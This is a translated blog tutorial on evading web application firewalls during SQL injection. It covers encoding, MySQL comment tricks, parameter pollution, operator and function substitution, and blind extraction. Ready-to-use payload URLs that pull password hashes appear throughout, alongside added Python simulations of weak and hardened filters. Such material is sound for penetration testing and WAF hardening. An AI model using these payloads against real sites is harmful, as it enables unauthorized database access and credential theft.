WAF bypass technology in SQL injection

Source: Internet
Author: User
Tags: mysql, injection, strcmp

1. Case variation bypass


Everyone knows this one. Against poorly written WAFs it is still remarkably effective: SQL keywords are case-insensitive but a careless filter is not, so if `union` is blocked, try `Union` or `UnIoN`.


2. Simple encoding bypass


The WAF matches the literal keyword, so we keep the keyword from appearing literally. `%55` is the URL encoding of `U` (0x55), so `union` can be written as `%55nion`: the web server decodes it back to `Union` before the application sees it, while a WAF that matches on the raw query string never sees `union`. Combine this with case variation, and encode one or several characters as you like. The caveat: this only works while the WAF decodes less than the application does; a WAF that URL-decodes (including double decoding) before matching is not fooled.


Hex-encoding a table name, or the file name passed to load_file(), as a `0x...` literal instead of a quoted string belongs to the same family: MySQL reads the hex literal as a string, but the WAF never sees the string it is looking for.


3. Comment Bypass


This is a narrower scenario. It applies to a WAF that only filters out (removes) a dangerous keyword from the request instead of blocking the whole request.


/?id=1+union+select+1,2,3/*


Suppose the WAF filters `union` and `select` out of the query above. We put a copy of each keyword inside a comment in front of the real one: the WAF removes the copy inside the comment, which was harmless anyway, and the real keyword passes through untouched, so the query still works.


So the bypass payload is:


/?id=1/*union*/union/*select*/select+1,2,3/*


There is also a comment trick specific to MySQL:


For example:


index.php?page_id=-15/*!union*//*!select*/1,2,3,4 ...


As you can see, we simply wrap the sensitive words in comments and add a `!` right after the opening `/*`. MySQL executes the contents of a `/*! ... */` comment as SQL (optionally gated on a server version, as in `/*!50000union*/`), whereas a WAF that treats every C-style comment as dead text never matches the keywords inside it.


4. Keyword splitting and double-writing bypass


Take the same example again. This applies to a WAF built on regular expressions that detects the sensitive words wherever they appear in the request and filters some of them out.


The idea is to break up the sensitive words with comments so that the WAF's regular expression no longer matches, while the database still accepts the query. Be careful with this one: MySQL treats a comment as a token separator, so `un/**/ion` is read as `un ion` and is a syntax error. Comments between keywords (`union/**/select`) do work against a WAF that matches on `union select` with whitespace; comments inside a keyword do not work on MySQL.


/?id=1+un/**/ion+sel/**/ect+1,2,3--


The rewrite (double-writing) bypass applies to a WAF that removes each keyword exactly once, on the same principle as the classic `a.aspsp` upload trick: delete `asp` once and `a.asp` is what remains. Write `ununionion`; after the WAF removes the inner `union` once, `union` is left and the query executes as intended.


?id=1+ununionion+select+1,2,3--
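To see why the bypasses in sections 1 to 4 work, and what a WAF must do to resist them, here is an added Python model (hypothetical code written for this page, not the article's own and not any real WAF product): three weak matchers, each with the flaw one of the sections exploits, next to a hardened matcher that decodes and normalizes the request the way the web server and MySQL will read it. The payload strings are constructed from the examples above.

```python
import re
from urllib.parse import unquote_plus

# Added example for this page (hypothetical code, not a real WAF product):
# three weak matchers modelled on the filters sections 1-4 exploit, and a
# hardened matcher that normalizes the request the way MySQL will read it.

KEYWORDS = ("union", "select")
KEYWORD_RE = re.compile(r"\b(union|select)\b")


def weak_match(raw_query: str) -> bool:
    """Sections 1-2: case-sensitive substring match on the undecoded string."""
    return any(k in raw_query for k in KEYWORDS)


def weak_comment_strip(raw_query: str) -> bool:
    """Section 3, /*! */ variant: treats every C-style comment as dead text."""
    visible = re.sub(r"/\*.*?\*/", " ", raw_query, flags=re.S).lower()
    return any(k in visible for k in KEYWORDS)


def weak_sanitize(raw_query: str) -> str:
    """Sections 3-4, decoy and double-write: deletes the first occurrence of
    each keyword once and forwards the remainder to the application."""
    out = raw_query
    for k in KEYWORDS:
        out = out.replace(k, "", 1)
    return out


def normalize(raw_query: str) -> str:
    """Hardened pre-processing: decode like the web server, fold case, keep the
    body of MySQL /*!...*/ comments (MySQL executes them), drop the rest."""
    s = raw_query
    for _ in range(3):                                  # single/double encoding
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = s.lower()
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)        # ordinary comment = space
    return re.sub(r"\s+", " ", s).strip()


def hardened_blocks(raw_query: str) -> bool:
    """Reject, never rewrite: a deleted keyword can regrow (ununionion)."""
    return KEYWORD_RE.search(normalize(raw_query)) is not None


def injects_after_sanitize(raw_query: str) -> bool:
    """Does a real keyword still reach MySQL after the weak filter ran?"""
    return KEYWORD_RE.search(normalize(weak_sanitize(raw_query))) is not None


def classify(raw_query: str) -> dict:
    return {
        "weak_match": weak_match(raw_query),
        "weak_comment_strip": weak_comment_strip(raw_query),
        "injects_after_sanitize": injects_after_sanitize(raw_query),
        "hardened": hardened_blocks(raw_query),
    }


# Constructed payloads, taken from the sections above.
PAYLOADS = {
    "case":         "id=1+UnIoN+SeLeCt+1,2,3--",
    "urlencode":    "id=1+%55nion+%53elect+1,2,3--",
    "version_cmt":  "page_id=-15/*!union*//*!select*/1,2,3,4",
    "decoy_cmt":    "id=1/*union*/union/*select*/select+1,2,3/*",
    # harmless as sent; only a deleting filter turns it into "union select"
    "double_write": "id=1+ununionion+selselectect+1,2,3--",
    # MySQL treats a comment as a token separator, so this is not valid SQL
    "split":        "id=1+un/**/ion+sel/**/ect+1,2,3--",
}

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name:13} {classify(payload)}")
```

Two results are worth noticing. The double-written payload is not flagged by the hardened matcher, and that is correct: as sent it is not an injection at all, it only becomes one after a sanitizing WAF deletes the inner keyword, which is why a WAF should block and never rewrite. The split payload is not flagged by anything, but MySQL rejects it too, so it is not a bypass on MySQL.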


5. HTTP Parameter Pollution (HPP)


For example, we have this statement:


/?id=1+union+select+1,2,3+from+users+where+id=1--


We can repeat the id parameter and spread our payload over the copies. On ASP and ASP.NET backends the values of a repeated parameter are joined with a comma, so `&id=` effectively becomes a comma in the final query (PHP, by contrast, keeps only the last value, so this depends on the platform):


/?id=1+union+select+1&id=2,3+from+users+where+id=1--


How well this works depends on the specific WAF implementation and on how the backend merges duplicate parameters.


An example of how this is used:


/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users--


How the final query is parsed depends on how the back-end code is written.


For example, if the server builds the query like this:


$sql = "SELECT * FROM table WHERE a=" . $_GET['a'] . " AND b=" . $_GET['b'] . " LIMIT " . $_GET['c'];


Then we can construct an injection like this:


/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--


The query the database finally receives is:


SELECT * FROM table WHERE a=1 union/* AND b=*/select 1,pass/* LIMIT */from users--


As you can see, this technique is better suited to white-box testing, where the query template is known; in a black-box engagement it is harder to use, but still worth trying.
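To make the parameter splitting concrete, here is an added simulation (hypothetical Python written for this page, not code from the article or from any real WAF): it rebuilds the article's three-parameter query the way the PHP above concatenates it, models the ASP-style comma merging of duplicate `id` values that the HPP examples rely on (an assumption about the backend; PHP keeps the last value), and shows why a WAF that inspects one parameter value at a time never sees `union ... select` while the database does.

```python
import re
from urllib.parse import parse_qs

# Added example for the HPP section (hypothetical Python written for this page,
# not the article's code). The ASP-style comma join of duplicate parameters is
# an assumption about the backend; PHP keeps the last value instead.

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
INJECT_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)

# The query the vulnerable PHP above assembles by string concatenation.
TEMPLATE = "SELECT * FROM table WHERE a={a} AND b={b} LIMIT {c}"


def parse_params(query_string: str, join_duplicates: bool) -> dict:
    """join_duplicates=True models ASP/ASP.NET ('1,2'); False models PHP ('2')."""
    raw = parse_qs(query_string, keep_blank_values=True)
    if join_duplicates:
        return {k: ",".join(v) for k, v in raw.items()}
    return {k: v[-1] for k, v in raw.items()}


def build_three_param_query(query_string: str) -> str:
    """a, b and c are pasted into the template unescaped, exactly like the PHP."""
    return TEMPLATE.format(**parse_params(query_string, join_duplicates=False))


def build_id_query(query_string: str) -> str:
    """Single id parameter on a backend that merges duplicates with commas."""
    return "SELECT * FROM users WHERE id=" + parse_params(query_string, True)["id"]


def per_parameter_waf_blocks(query_string: str) -> bool:
    """Weak WAF: looks at each submitted value in isolation. No single value
    of an HPP payload contains both keywords, so nothing is flagged."""
    values = [v for vals in parse_qs(query_string, keep_blank_values=True).values()
              for v in vals]
    return any(INJECT_RE.search(COMMENT_RE.sub(" ", v)) for v in values)


def final_statement_blocks(sql: str) -> bool:
    """Inspecting the assembled statement, comments removed, is the only view
    in which the split keywords become adjacent again."""
    return INJECT_RE.search(COMMENT_RE.sub(" ", sql)) is not None


if __name__ == "__main__":
    qs = "a=1+union/*&b=*/select+1,pass/*&c=*/from+users--"
    sql = build_three_param_query(qs)
    print(sql, per_parameter_waf_blocks(qs), final_statement_blocks(sql))
    qs = "id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users--"
    sql = build_id_query(qs)
    print(sql, per_parameter_waf_blocks(qs), final_statement_blocks(sql))
```

The lesson for the defender is that the WAF cannot know how the application will stitch parameters together; the reliable fix is on the application side, a prepared statement with bound parameters, so that no concatenation happens at all.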


6. Bypass using the logical operators OR/AND


/?id=1+or+0x50=0x50


/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74


A word on the second payload, reading from the innermost parentheses outward: `select pwd from users limit 1,1` returns one row of the pwd column starting at offset 1, that is the second record (use `limit 0,1` for the first); say its value is `admin`.

`mid(..., 1, 1)` takes the first character of that value, `a`.

`lower(...)` folds the character to lowercase.

`ascii(...)` converts it to its character code (97 for `a`), and the comparison with 74 (the code of `J`) tells you whether the guess was right. Walk the compared value until the condition holds and you have recovered the character.


7. Comparison operator substitution


These include `!=` (not equal), `<>` (not equal), `<` (less than) and `>` (greater than); any of them can stand in for `=` when `=` is blocked.


Take the previous example, where we test whether the character code is 74. If `=` is filtered, test whether it is greater than 73 and not less than 75 instead, and you still know it is 74. Better still, `>` alone supports a binary search over the 0 to 127 range, so each character costs about seven requests rather than one per candidate value. Many WAFs forget about the comparison operators.


8. Function substitution


substring() can be replaced by mid() or substr(); all three extract part of a string.


ascii() can be replaced by hex() or bin(), which return the hexadecimal or binary form of the value instead of the character code. benchmark() can be replaced by sleep(); both are used for time-based blind injection and will be covered another time.


If even these are blocked, there is another way:


SUBSTRING((SELECT 'password'),1,1)=0x70

SUBSTR((SELECT 'password'),1,1)=0x70

MID((SELECT 'password'),1,1)=0x70


All three test the first character of 'password' (0x70 is `p`; MySQL compares a hex literal as a string here). When they are blocked, the same test can be written as:


STRCMP(LEFT('password',1),0x69)=1

STRCMP(LEFT('password',1),0x70)=0

STRCMP(LEFT('password',1),0x71)=-1


Here left() takes the leading character of the string and strcmp() compares two strings: it returns 0 when they are equal, 1 when the first argument sorts after the second (`p` comes after `i`, 0x69), and -1 when it sorts before (`p` comes before `q`, 0x71).


group_concat(), concat() and concat_ws(), which I have covered before, can also stand in for one another.


9. Blind injection without AND/OR


For example, there is an injection point:


index.php?uid=123


If AND and OR are filtered there is a more direct way: replace the 123 itself with an expression that evaluates to 123 only when our guess is right:


index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)+123


The page renders normally for uid 123. We are guessing the first character of the hash: if it is 0x42 (`B`), strcmp() returns 0 and 0+123=123, so the normal page comes back. If not, strcmp() returns -1 or 1, uid becomes 122 or 124 and the page changes. Repeat for each candidate and each position, and you never send AND or OR.
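The following added example (a hypothetical Python simulation written for this page, not the article's code; the `users` row, its hash and uid 123 are constructed) models the database evaluating the attacker's arithmetic for `uid=<expr>` and runs two extraction loops. The first is the strcmp() trick from this section. The second combines it with the comparison operators of section 7: MySQL evaluates `ascii(...)>N` to 0 or 1, so `(ascii(mid(hash,n,1))>N)+122` is 123 exactly when the character code exceeds N, which allows a binary search per character while still using no `=`, AND or OR.

```python
from typing import Callable, Tuple

# Added example for sections 7 and 9 (hypothetical simulation written for this
# page, not the article's code). The users row, hash and uid 123 are constructed.


# MySQL semantics modelled in Python. Note that STRCMP returns -1, 0 or 1.
def mysql_strcmp(a: str, b: str) -> int:
    return (a > b) - (a < b)


def mysql_left(s: str, n: int) -> str:
    return s[:n]


def mysql_mid(s: str, pos: int, length: int) -> str:
    return s[pos - 1:pos - 1 + length]          # MySQL positions are 1-based


def mysql_ascii(s: str) -> int:
    return ord(s[0]) if s else 0


USERS = {123: {"login": "admin", "hash": "5f4dcc3b5aa765d61d8327deb882cf99"}}
TARGET_HASH = USERS[123]["hash"]                # the secret column value


def page_for(uid: int) -> str:
    """index.php?uid=N renders the normal page only for an existing row."""
    row = USERS.get(uid)
    return f"welcome {row['login']}" if row else "no such user"


def server(expr: Callable[[str], int]) -> str:
    """index.php?uid=<expr>: the database evaluates the attacker's arithmetic
    against the hash column, and the page depends on the resulting uid."""
    return page_for(expr(TARGET_HASH))


NORMAL_PAGE = page_for(123)                     # what the attacker saw first


def extract_with_strcmp(length: int, alphabet: str = "0123456789abcdef") -> Tuple[str, int]:
    """Section 9: uid=STRCMP(LEFT(hash,n),0x..)+123. The normal page comes back
    only when the prefix guess is exact. Linear in the alphabet size per
    position; returns (recovered hash, number of requests)."""
    known, requests = "", 0
    for n in range(1, length + 1):
        for c in alphabet:
            guess = known + c
            requests += 1
            if server(lambda h: mysql_strcmp(mysql_left(h, n), guess) + 123) == NORMAL_PAGE:
                known = guess
                break
        else:
            raise RuntimeError(f"position {n}: character not in alphabet")
    return known, requests


def extract_with_comparison(length: int) -> Tuple[str, int]:
    """Sections 7 and 9 combined: uid=(ASCII(MID(hash,n,1))>N)+122. MySQL
    evaluates the comparison to 0 or 1, so uid is 123 exactly when the code
    exceeds N. Binary search: about 7 requests per character, no '=' at all."""
    known, requests = "", 0
    for n in range(1, length + 1):
        lo, hi = 0, 127                         # invariant: lo < code <= hi
        while hi - lo > 1:
            pivot = (lo + hi) // 2
            requests += 1
            if server(lambda h: int(mysql_ascii(mysql_mid(h, n, 1)) > pivot) + 122) == NORMAL_PAGE:
                lo = pivot
            else:
                hi = pivot
        known += chr(hi)
    return known, requests


if __name__ == "__main__":
    print(extract_with_strcmp(32))
    print(extract_with_comparison(32))
```

Both loops recover the 32-character hash; the strcmp() version needs up to 16 requests per hex character, the comparison version 7 regardless of alphabet, which is why the comparison operators matter as much to a WAF author as `=` does.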


10. Parentheses


/?id=1+union+(select+1,2+from+users)


Suppose the payload above is intercepted by the WAF. Try adding parentheses in various places:


/?id=1+union+(select+1,2+from+xxx)


/?id=(1)union(select(1),mid(hash,1,32)from(users))


/?id=1+union+(select+'1',concat(login,hash)+from+users)


/?id=(1)union(((((((select(1),hex(hash)from(users))))))))


/?id=(1)or(0x50=0x50)


11. "Buffer overflow" bypass


This one comes from a foreign blog:


id=1 and (select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAA)+union+select+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+


The more A's in the 0xAAAA... literal the better; in practice more than 1000 are needed. Despite the name, this is not a memory-corruption bug in the WAF: it exploits WAFs that inspect only a bounded number of bytes of a request, so the oversized hex literal pushes the actual injection past the part that gets scanned, while MySQL happily evaluates the whole statement.


This article comes from the blog "My World, I Am the Director"; please keep this attribution: http://biock.blog.51cto.com/4643304/1643918

